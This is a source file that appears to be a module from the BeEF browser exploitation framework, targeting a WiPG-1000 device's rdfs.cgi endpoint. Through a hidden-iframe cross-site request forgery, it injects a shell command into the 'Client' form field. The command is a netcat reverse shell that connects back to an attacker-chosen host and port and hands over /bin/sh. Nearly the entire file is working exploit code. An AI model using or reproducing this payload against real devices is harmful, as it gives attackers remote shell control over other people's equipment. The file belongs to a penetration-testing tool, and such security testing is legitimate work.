//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
  var rhost = '<%= @rhost %>';
  var rport = '<%= @rport %>';
  var lhost = '<%= @lhost %>';
  var lport = '<%= @lport %>';
  var timeout = 15;

  var url = "http://" + rhost + ":" + rport + "/cgi-bin/rdfs.cgi";
  var fifo = '/tmp/' + Math.random().toString(36).substring(7);
  var payload = 'mkfifo ' + fifo + '; nc ' + lhost + ' ' + lport + ' 0<' + fifo + ' | /bin/sh >' + fifo + ' 2>&1; rm ' + fifo;

  beef.debug("[WiPG-1000 Command Injection] Sending payload: " + url);
  var wipg1000_cmd_injection_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(
    url, 'POST', 'application/x-www-form-urlencoded', [
      {'type':'hidden', 'name':'Client', 'value':';' + payload + ';'},
      {'type':'hidden', 'name':'Download', 'value':'Download'}
    ]);
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

  cleanup = function() {
    document.body.removeChild(wipg1000_cmd_injection_iframe_<%= @command_id %>);
  }
  setTimeout("cleanup()", timeout*1000);

});

